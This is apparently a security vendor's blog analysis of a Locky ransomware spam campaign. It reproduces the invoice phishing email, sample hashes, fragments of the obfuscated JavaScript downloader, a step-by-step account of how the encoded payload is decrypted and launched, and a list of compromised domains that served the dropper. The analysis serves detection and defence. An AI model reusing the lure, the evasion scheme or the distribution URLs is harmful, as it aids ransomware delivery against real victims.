Locky Ransomware Shipping With a New Loader

Locky new loader

ReaQta has been monitoring a new and massive worldwide Locky ransomware spam campaign. The attacks are carried out in the usual way: a javascript file attached to an email message delivered to the victims, although this is the first campaign we have tracked that shows a different deployment behaviour. The javascript downloader usually retrieves Locky’s dropper from a compromised website, while in this case the downloaded file is encoded making it harder for traditional protection solutions to spot the incoming threat.

Locky Rigged Email

The spam campaign presents the subject line: New Invoice with the following body:

Dear jean,

I appreciate your speaking with me today. Per our conversation, please find attached invoice.

Please do not hesitate to contact me with any questions you may have. Thank you for your time and consideration.

Sincerely,

Hollis Summers

Minerva Neurosciences, Inc

Phone: +1 (267) 351-85-20

The attachment is called INVOICE_jean.zip and it contains the javascript file which we have analyzed (MD5: 2E747E682BEF95B559AC3F3D14C8B0E4) that presented a 2/57 or 3% detection rate when it was first uploaded.

Locky Downloader JS detection rate
Locky Downloader JS detection rate

Javascript Analysis

For convenience we have created a gist with the original javascript code found inside the zip attachment. The JS script uses two obfuscation layers, the result after the first passage can be found here.

The second layer presents uses lots of variables and function definitions to make the analysis harder:

var MUj = (HCs0 + (function Oa() {
    return CFo;
}()) + Qi, RQo + VTj(KRy) + Hn + LBRHp + JYk9 + JPo);

It is quite hard to understand what’s going on, anyway after deobfuscating the second layer as well, we finally obtain a more understandable code.

We can quickly spot the domains used to download Locky:

Locky Distribution Domains
Locky Distribution Domains

all of them appear to be compromised and used without the legit owner’s knowledge.

The initial download request happens through WinHttp.WinHttpRequest.5.1 instead of the usual MSXML2.XMLHTTP. Inside the do-while loop we can find the script’s part that takes care of downloading, decoding and finally executing Locky’s dropper.

This is the code that checks whether or not the download is still in progress:

if (VFHu.readystate < 4) {
    WScript.Sleep(100);
    continue;

When completed the ResponseBody is saved, for this particular script, in %TEMP%/dEMCTgpxP.exe.

The picture below shows an excerpt of the ResponseBody containing the the encoded file.

Locky_new_loader_responsebody

After the file has been saved to disk a decoding function is executed to decrypt the file before running it.

Locky payload decoding
Locky payload decoding

JFSHm is the function responsible for reading the file content and for building an array that is decoded using ZUe, another array, as an S-Box. The array returned by the JFSHm function is passed to the NWAq5 function. The body of this function uses the following decoding scheme:

  1. The first 4 items are removed from the array at a position that equals to Bp size.
  2. The array obtained in the previous step is reversed.
  3. Finally a xor decryption with a dynamic key is applied.
Locky Payload Decryption
Locky Payload Decryption

Apparently Locky’s authors are moving towards a more encryption-based approach that appears to be still immature, but nevertheless effective to avoid detection.

After these steps have been completed the script makes a few sanity checks: the size of the manipulated array must not be lower than 153600 bytes and not bigger than 179200 bytes, also a valid MZ signature must be present. At this point the decoded content goes through another substitution phase, applied by the KGa function, before being written to disk.

Locky last substitution stage
Locky last substitution stage

Finally 123 is passed as an argument to the decoded file that is about to be launched. Without this parameter the dropper is unable to perform the unpacking process and to get the payload running. (MD5: 3A0AA8730FA9B0E71C23FF2921597B84).

At upload time the detection rate was 13/55 or just 23%.

Payload Detection Rate
Locky new loader payload detection rate

Compromised Domains

This is the list of compromised domains we have retrieved while tracking this campaign:

80.244.134.169/ xyvg0g
933666.net/ ttfzuba
asliaypak.com/ xbyemr78
bani-shehr.org/ 3aoopl3
compa.me/ 94nyc
dermadom.com.mx/ sbee4fy
gkabiye.com/ j0vyirf
haiphongict.com/ ppw5p
heavenboundministry.com/ 5uenput
iminlife.com/ 362wz
indianflowers.org/ qhg1i
infobroadband.com/ ztbk7y1
jade-palace.com/ 1ywwhsx
mvfashionoutlet.com/ o9x0720h
mybootstore.com/ fgj69p
officeconnectme.com/ o6077arl
qasralawani.com/ nu7pd
rasberrie.com/ mvmaas
risefallsinkswim.com/ u6gcc5ux
romantikbutik.com/ rd0j2w
sevvalsenturk.com/ 1iaqn
shoopinghere.com/ nm1aticp
shopapm.com/ dfied
shubhkamnaye.in/ k6urzuq
smoochintimates.com.au/ gfwdo0c
sportsandwine.com.au/ jilh5cck
temadanismanlik.net/ ceup52n
theguildedquill.com/ 9wt3fn
u-flats.com/ x147vd
wbksis.com/ wzmgallo
www.iminlife.com/ 362wz
www.nirmallifeline.com/ o62sz
www.sportskart.co/ lufy0

Conclusion

The cat and mouse game between ransomware and protection solutions is still raging, with ransomware authors adopting slightly more sophisticated techniques that, according to detection rates, are proving to be successful. Ransomware, despite their intrinsic simplicity, remain a feared threat that is proving to be hard to contain for small companies to big corporations alike. If your company has been hit by a ransomware and you’re looking for a proven and effective ransomware protection, you might want to check out ReaQta-core.

Join our newsletter to get the world’s latest security events and our technical analyses delivered directly to your inbox!

ReaQta